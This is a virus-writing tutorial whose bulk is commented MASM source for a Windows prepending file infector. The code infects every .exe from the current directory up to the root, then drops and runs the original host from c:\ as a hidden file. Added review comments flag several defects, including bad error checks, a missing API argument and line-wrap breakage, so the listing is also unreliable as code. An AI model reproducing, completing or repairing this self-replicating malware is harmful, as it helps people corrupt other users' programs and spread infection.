.Introduction: The prepending method of infection is to some extent considered lame, but it still does its job. In this piece I will explain the method. Apologies in advance for my English. The following is for educational purposes only; the usual disclaimer applies — whatever you do with it is your own responsibility.
.Prepending: how does it work?
Prepending infection, by definition, means placing your virus body (the compiled/assembled .exe) at the beginning of the victim executable, with the original victim moved to the end. The virus therefore never has to parse or patch the executable headers: the infected file's header is simply the virus's own header, and the original host is carried after it as an opaque blob. This is also one reason the technique is considered lame: every infected file starts with the same vir_size bytes and grows by the same amount, so it is easy to spot.
.Getting started
To build a prepender virus you do not have to learn assembly; it can be done in any other programming language. With assembly, however, you can do a lot more if you know what you are doing. So let us put the steps for coding the virus in order:
-find a victim file
-read your own virus image (the file of the currently running process) into memory, and open the victim file that the search found
-write the virus at the beginning and the victim at the end
-drop and execute the old victim if one is present (not in the first generation)
-wait for the dropped file to finish so that it can be deleted
.Getting deeper
See the following commented code:
;------------------cut from here
.586
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib
;------------------------the above are just the includes and libraries you
;------------------------need to assemble the following
vir_size = 4096 ;number of bytes of this process's own image treated as the virus body; must equal the assembled size of this program (the author suggests padding/merging to reach it)
.data ;----initialised data
mark db "das ist zu kalt!",0 ;trailer appended after the carried host by infect; never read anywhere in this listing
ext db "*.exe",0 ;FindFirstFile pattern: every .exe in the current directory
up_one db "..",0 ;SetCurrentDirectory argument used to walk up one level
.data?
wf32 WIN32_FIND_DATA<?> ;current FindFirstFile/FindNextFile result; infect reads wf32.cFileName
fhandle dd ? ;search handle returned by FindFirstFile
buffer db 512 dup (?) ;previous cFileName; the search loop compares it to the new one to detect end of search
buffer_directory1 db 256 dup (?) ;current directory before the ".." step
buffer_directory2 db 256 dup (?) ;current directory after the ".." step; equal to buffer_directory1 means the root was reached
buffer_inf db 512 dup (?) ;this process's own path (GetModuleFileName is given a 256-char limit)
delta_handle dd ? ;handle of the host file dropped into c:\ by drop_old
.code
;----beginning of needed procedures
;----about the infecting procedure: it is simple.
;----I avoided infecting Windows-directory files (in the listing this is a crude check on the file name).
;----In this infecting method we just need memory of size = victim size + vir_size
;----(the listing actually uses two separate buffers, one per file); we put the virus body first
;----and the victim body after it.
;----We start by opening our own virus file and copying its bytes into memory, then we
;----close the file;
;----then we open the victim file for writing, but we first read it into memory;
;----next we write our virus first (with size = vir_size), then we put the victim data
;----at the end.
;///////////////////////infect procedure
;-----------------------------------------------------------------------
; infect
; Purpose:  prepend the first vir_size bytes of this process's own
;           executable to the file named in wf32.cFileName, then append
;           the original target bytes and the `mark` string.
; In:       wf32.cFileName (global) = candidate name from the search loop,
;           resolved relative to the current directory.
; Out:      no return value. Side effects: cfile_handle/cfile_size/cmemory
;           are left holding this image's copy and are reused later by
;           start and drop_old; the target file is rewritten in place.
; Clobbers: eax, edx, flags, plus whatever the invoked APIs clobber.
; NOTE(review): every early `je exit_inf` leaves whatever handle or
;           GlobalAlloc buffer has been obtained so far unreleased.
;-----------------------------------------------------------------------
infect proc
; Skip names whose bytes from offset 3 spell "WIN"/"win" -- the author's
; stand-in for "do not touch the Windows directory". cFileName holds the
; bare name matched by the search, so this looks at characters 4-5 of the
; file name rather than at the directory. Only a 16-bit word is compared,
; against a three-character literal; whether the assembler accepts or
; truncates that literal is not shown here.
mov eax,offset wf32.cFileName
add eax,3
cmp word ptr [eax],"NIW"
je exit_inf
cmp word ptr [eax],"niw"
je exit_inf
; Open our own executable: GENERIC_READ (80000000h), no sharing,
; OPEN_EXISTING (3).
invoke GetModuleFileName,0,offset buffer_inf,256
invoke CreateFile,offset buffer_inf,80000000h,0,0,3,0,0
or eax,eax
; NOTE(review): CreateFile reports failure as INVALID_HANDLE_VALUE (-1),
; so a zero test does not catch it. The `.data?` directive sharing this
; line with the jump looks like a line-wrapping artifact of the listing;
; the author's closing note says the code is not guaranteed to assemble.
jz exit_inf .data?
cfile_handle dd ? ;handle of our own executable
cfile_size dd ? ;its size in bytes (drop_old later subtracts vir_size from this global)
cmemory dd ? ;GlobalAlloc buffer holding a full copy of our own image
bwr dd ? ;bytes-transferred output slot shared by every ReadFile/WriteFile
.code
mov cfile_handle,eax
invoke GetFileSize,cfile_handle,0
cmp eax,0
je exit_inf
mov cfile_size,eax
; Read the whole image into memory; this buffer is never freed.
invoke GlobalAlloc,0,eax
mov cmemory,eax
cmp eax,0
je exit_inf
invoke ReadFile,cfile_handle,cmemory,cfile_size,offset bwr,0
cmp eax,0
je exit_inf
invoke CloseHandle,cfile_handle
; 'ZM' as a word immediate is stored little-endian as the bytes "MZ".
; If our own image already has a DOS header at offset vir_size (i.e. this
; copy is carrying a host), infection is abandoned -- so only a bare
; first-generation copy ever infects; whether that is intended is not
; stated. If the image is exactly vir_size bytes long this reads one
; word past the buffer.
mov edx,cmemory
cmp word ptr [edx+vir_size],'ZM'
je exit_inf
; NOTE(review): SetFileAttributes takes (lpFileName, dwFileAttributes);
; only one argument is supplied here, which `invoke` will reject against
; the prototype in windows.inc.
invoke SetFileAttributes,FILE_ATTRIBUTE_ARCHIVE
; Open the target read/write (GENERIC_WRITE or GENERIC_READ),
; OPEN_EXISTING. Same failure-test caveat as above.
invoke CreateFile,offset wf32.cFileName,40000000h or 80000000h,0,0,3,0,0
or eax,eax
jz exit_inf
.data?
inf_fHandle dd ? ;handle of the target file
inf_fSize dd ? ;target size in bytes
inf_mem dd ? ;GlobalAlloc buffer holding the original target bytes (never freed)
.code
mov inf_fHandle ,eax
invoke GetFileSize,inf_fHandle,0
or eax,eax
jz exit_inf
mov inf_fSize,eax
invoke GlobalAlloc,0,inf_fSize
or eax,eax
jz exit_inf
mov inf_mem,eax
; Slurp the original target so it can be re-emitted after the virus body.
invoke ReadFile,inf_fHandle,inf_mem,inf_fSize,offset bwr,0
or eax,eax
jz exit_inf
; Rewind to offset 0. The arguments are written as (hFile, FILE_BEGIN, 0, 0)
; but SetFilePointer's order is (hFile, distance, distanceHigh, method);
; this only lands on the file start because FILE_BEGIN equals 0.
invoke SetFilePointer,inf_fHandle,FILE_BEGIN,0,0
; New layout: [vir_size bytes of our image][original target][mark].
; The file is not truncated first, but the result is always longer than
; the original, so no stale tail remains. If our own image is shorter
; than vir_size, the first write copies past the end of cmemory.
invoke WriteFile,inf_fHandle,cmemory,vir_size,offset bwr,0
invoke WriteFile,inf_fHandle,inf_mem,inf_fSize,offset bwr,0
invoke WriteFile,inf_fHandle,offset mark,sizeof mark,offset bwr,0
invoke CloseHandle,inf_fHandle
exit_inf :
ret
infect endp
;//////////////////////end of infect procedure
;----the drop-old procedure is called when the check on our own image finds
;----an old victim carried after the virus body.
;----It works by creating a file with the same name in the "temp" directory, which is simply 'c:\' :/
;----We take a pointer to the old victim inside our image and write it to that temp file,
;----then we start the old victim as a new process.
;----The problem is that we then have to delete the old victim after it finishes
;----running. I used the WaitForSingleObject API: it waits while the object (our
;----child) is still running and returns once it has finished;
;----the timeout is set to -1 (infinite).
;----Then we call the del_tracks procedure, which loops
;----trying to delete the temp file (the old victim).
;////////////////drop old victim procedure
;-----------------------------------------------------------------------
; drop_old
; Purpose:  extract the host carried after our own vir_size-byte image,
;           write it to c:\ under our own base name, run it, wait for it,
;           then delete it.
; In:       cmemory / cfile_size (globals filled in by an earlier infect
;           call) = copy of our own image and its size.
; Out:      nothing. Side effects: cfile_size is reduced by vir_size, the
;           current directory becomes c:\, and esi is left pointing at the
;           base name inside buffer_inf (del_tracks reads it from there).
; Clobbers: eax, esi, flags, plus API clobbers.
; NOTE(review): assumes cmemory was populated; start calls this after a
;           search that may never have reached GlobalAlloc.
;-----------------------------------------------------------------------
drop_old proc
invoke GetModuleFileName,0,offset buffer_inf,256
.data
tempdir db "c:\",0 ;drop location (the "temp directory", as the author calls it)
.data?
stinfo STARTUPINFOA<?> ;filled by GetStartupInfo and handed to CreateProcess
prinfo PROCESS_INFORMATION <?> ;receives the child's process/thread handles
.code
; Find the last '\' in buffer_inf by scanning backwards from the end of
; the 256-byte window GetModuleFileName was given; afterwards esi points
; at the base name. Bytes beyond the NUL are stale buffer contents, and
; the scan has no lower bound if no backslash is present.
mov esi,offset buffer_inf
add esi,256
loop_slash:
dec esi
cmp byte ptr [esi],'\'
jne loop_slash
inc esi
; Create c:\<basename>: GENERIC_WRITE, CREATE_ALWAYS (2),
; FILE_ATTRIBUTE_HIDDEN (2h). The returned handle is not validated.
invoke SetCurrentDirectory,offset tempdir
invoke CreateFile,esi,40000000h,0,0,2,2h,0
mov delta_handle,eax
; The host occupies cmemory+vir_size for cfile_size-vir_size bytes.
; The subtraction is applied to the global itself, so calling this
; procedure twice would shrink it again.
mov eax,cmemory
add eax,vir_size
sub cfile_size,vir_size
invoke WriteFile,delta_handle,eax,cfile_size,offset bwr,0
invoke CloseHandle,delta_handle
; Launch the dropped host in a new console and block until its primary
; thread ends (-1 = INFINITE). The child's process/thread handles are
; never closed. The `offset`/`prinfo` split across two lines looks like
; a line-wrapping artifact of the listing.
invoke GetStartupInfo,offset stinfo
invoke CreateProcess,esi,0,0,0,0,CREATE_NEW_CONSOLE,0,0,offset stinfo,offset
prinfo
invoke WaitForSingleObject,prinfo.hThread,-1
; del_tracks takes the file name implicitly in esi.
call del_tracks
; Shows the dropped file's name; looks like a debugging aid.
invoke MessageBox,0,esi,esi,0
ret
drop_old endp
;//////////////////end of drop old victim procedure
;----the following procedure, delete-tracks, deletes the
;----temporarily created victim file
;///////////////////delete track procedure
;-----------------------------------------------------------------------
; del_tracks
; Purpose:  delete the dropped host file, retrying until DeleteFile
;           reports success.
; In:       esi = NUL-terminated file name (set up by drop_old; the
;           current directory is c:\ at that point).
; Out:      nothing. Clobbers eax, flags and API clobbers; esi survives
;           the stdcall API call.
; NOTE(review): a tight spin with no delay and no retry bound; if the
;           file can never be deleted (still open, or not present), this
;           never returns.
;-----------------------------------------------------------------------
del_tracks proc
loop_7:
invoke DeleteFile,esi
cmp eax,0
je loop_7
ret
del_tracks endp
;//////////////////end of delete tracks procedure
;////////////start of our program
;-----------------------------------------------------------------------
; start -- program entry point.
; 1. Call infect on every *.exe found in the current directory.
; 2. Step up one directory with ".." and repeat until the directory no
;    longer changes (root reached).
; 3. If our own image carries a host after offset vir_size, drop and run
;    it (drop_old); then exit.
;-----------------------------------------------------------------------
start:
;---searching for victim files with the FindFirstFile and FindNextFile APIs;
;---each file found is passed to the infection routine.
infectious:
; Begin a new search in the current directory. The handle is stored but
; not checked; infect is called on the first hit regardless of success.
invoke FindFirstFile,offset ext,offset wf32
mov fhandle,eax
call infect
loop_1: ;beginning search files l00p
; End-of-search detection: remember the previous cFileName, advance,
; and stop when the name did not change. FindNextFile's return value is
; not consulted; the string comparison stands in for it.
invoke RtlZeroMemory ,offset buffer,512
invoke lstrcpy,offset buffer,offset wf32.cFileName
invoke FindNextFile,fhandle,offset wf32
invoke lstrcmp,offset buffer,offset wf32.cFileName
cmp eax,0
je exit_loop_1
call infect
jmp loop_1
exit_loop_1: ;exit the searching loop
; Walk up one level. If SetCurrentDirectory("..") leaves the directory
; unchanged we are at the root and the walk ends; otherwise release the
; search handle (with CloseHandle rather than FindClose) and search again
; from the new directory. The handle is not released on the exit_up path.
invoke GetCurrentDirectory,256,offset buffer_directory1
invoke SetCurrentDirectory,offset up_one
invoke GetCurrentDirectory,256,offset buffer_directory2
invoke lstrcmp,offset buffer_directory1,offset buffer_directory2
cmp eax,0
je exit_up
invoke CloseHandle,fhandle
jmp infectious
exit_up:
; 'ZM' little-endian is the bytes "MZ": a DOS header right after our own
; vir_size bytes means we are carrying a host. cmemory is only valid if
; some infect call got as far as GlobalAlloc; otherwise edx is 0 and this
; dereferences address vir_size.
mov edx,cmemory ;just checking for an attached old victim
cmp word ptr [edx+vir_size],'ZM'
je call_dropper
jmp a_5
call_dropper:
call drop_old
a_5:
exit_me:
invoke ExitProcess,0 ;end of the LamE storiE
end start
;---- end of cut
NOTE: I do not guarantee that the above code works properly, since I added and deleted some
lines while writing this; so please do not just copy-paste it and run it —
understand the technique and get on with your life.